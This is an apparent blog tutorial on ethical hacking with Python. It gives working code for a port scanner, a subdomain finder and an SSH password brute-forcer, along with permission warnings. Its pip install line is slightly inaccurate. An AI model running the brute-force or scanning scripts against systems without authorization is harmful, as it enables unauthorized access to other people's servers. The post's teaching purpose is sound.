Ethical Hacking with Python – Penetration Testing Scripts.

Are you interested in ethical hacking with Python? Want to learn how penetration testers use Python to identify security vulnerabilities? In this guide, we will cover three powerful yet simple Python scripts used in cybersecurity, including:

✅ Python Port Scanner (Network Security)
✅ Subdomain Finder (Information Gathering)
✅ SSH Password Bruteforce Attack (Password Security Testing)

By the end of this post, you’ll be able to write penetration testing scripts and understand how ethical hackers assess system security. Let’s dive in! 🔥

🔹 Why Use Python for Ethical Hacking?

Python is one of the most popular programming languages for penetration testing due to its:

✅ Easy syntax – Beginners can quickly write hacking scripts.
✅ Powerful libraries – Python offers hacking tools like socket, requests, scapy, and nmap.
✅ Automation capability – Helps automate network scanning, web scraping, and brute-force attacks.

Let’s set up our ethical hacking environment and start coding! 💻

🔹 Setting Up Python for Penetration Testing

Before we write hacking scripts, install the required Python libraries:

pip install requests scapy socket paramiko nmap

These libraries allow us to perform network scanning, subdomain enumeration, and password brute-forcing.

1️⃣ Python Port Scanner – Scan Open Ports

A port scanner helps ethical hackers find open ports on a target machine. Open ports may indicate security vulnerabilities that hackers can exploit.

📝 Python Script: Port Scanner

import socket

def port_scanner(target, ports):
    print(f"Scanning {target}...")
    for port in ports:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        socket.setdefaulttimeout(1)
        result = s.connect_ex((target, port))
        if result == 0:
            print(f"[+] Port {port} is open")
        s.close()

target_ip = "example.com"  # Replace with target IP or domain
ports = [21, 22, 80, 443, 3306]
port_scanner(target_ip, ports)

📌 How It Works:

🔹 Uses Python’s socket module to check if ports are open.
🔹 Scans ports like 21 (FTP), 22 (SSH), 80 (HTTP), 443 (HTTPS), 3306 (MySQL).
🔹 Helps penetration testers find security risks in networks.

📌 Important: Always have permission before scanning a target! 🚨

2️⃣ Python Subdomain Finder – Find Hidden Subdomains

Subdomains can reveal admin panels, test servers, or hidden areas of a website that are vulnerable to attacks.

📝 Python Script: Subdomain Finder

import requests

def subdomain_finder(domain, wordlist):
    for sub in wordlist:
        url = f"http://{sub}.{domain}"
        try:
            requests.get(url)
            print(f"[+] Found: {url}")
        except requests.ConnectionError:
            pass

subdomains = ["test", "mail", "dev", "blog"]
subdomain_finder("example.com", subdomains)

📌 How It Works:

🔹 Uses Python’s requests module to find active subdomains.
🔹 Checks if a subdomain exists by sending HTTP requests.
🔹 Helps bug bounty hunters discover vulnerable subdomains.

🔥 Pro Tip: Use a bigger wordlist for advanced testing!

3️⃣ Python SSH Bruteforce Attack – Testing Weak Passwords

SSH is a common way to remotely access servers. Weak passwords can allow hackers to brute-force login credentials and gain unauthorized access.

📝 Python Script: SSH Bruteforce Attack

import paramiko

def ssh_bruteforce(target, username, passwords):
    for password in passwords:
        try:
            client = paramiko.SSHClient()
            client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
            client.connect(target, username=username, password=password)
            print(f"[+] Password found: {password}")
            return
        except:
            print(f"[-] Failed: {password}")

passwords = ["admin", "1234", "password", "root"]
ssh_bruteforce("192.168.1.10", "root", passwords)

📌 How It Works:

🔹 Uses paramiko, a Python SSH client, to attempt logins.
🔹 Tries multiple passwords to find weak credentials.
🔹 Helps ethical hackers identify vulnerable SSH servers.

⚠️ Warning: NEVER use this script on unauthorized systems! Bruteforcing is illegal without permission. 🚨

🔹 Ethical Hacking with Python: Key Takeaway

🔹 Python is a powerful language for penetration testing and cybersecurity.
🔹 We built three hacking scripts:
✅ Port Scanner (Find open ports)
✅ Subdomain Finder (Find hidden domains)
✅ SSH Bruteforce Attack (Test weak passwords)
🔹 Always test on authorized systems only.

📌 Want More?
💡 Interested in learning advanced ethical hacking with Python? Comment below & subscribe for more tutorials! 🚀

👉 Visit cybersamir.com for more cybersecurity tutorials.

🔥 Follow us for Ethical Hacking Tips!